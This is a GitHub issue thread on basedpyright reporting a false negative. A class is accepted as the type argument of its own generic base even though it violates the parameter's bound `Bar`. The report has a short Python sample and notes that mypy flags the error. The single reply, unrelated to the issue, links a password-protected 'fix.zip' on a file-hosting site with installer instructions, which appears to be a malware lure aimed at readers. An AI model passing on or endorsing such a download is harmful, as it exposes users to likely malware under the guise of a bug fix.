### ISSUE TITLE
false negative when class extends subclass with that class as a generic

### ISSUE THREAD

**Issue by DetachHead** [DetachHead/basedpyright#617]
Code sample in [basedpyright playground](https://basedpyright.com/?pythonVersion=3.13&typeCheckingMode=all&code=MYGwhgzhAEBCYCcBc0B06BQHSRgMQHsCBtAFRXgQF0V1UscpoBFAVwA8AKQkgIjfa8qASiR1oAYmgA7AtACmCBAQQAaBQDd506ABcAFgVYBzfSw7QAljFm7oYaBFYAjXQE8ADvOgEAZnEQgA)

```python
class Bar: ...

class Foo[T: Bar]: ...

class Qux(Foo["Qux"]):... # no error, even though Qux is not a subtype of Bar
```

[mypy correctly reports an error here](https://mypy-play.net/?mypy=latest&python=3.12&gist=e90bd199ac32b63c0e783d3e8f1d1803)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
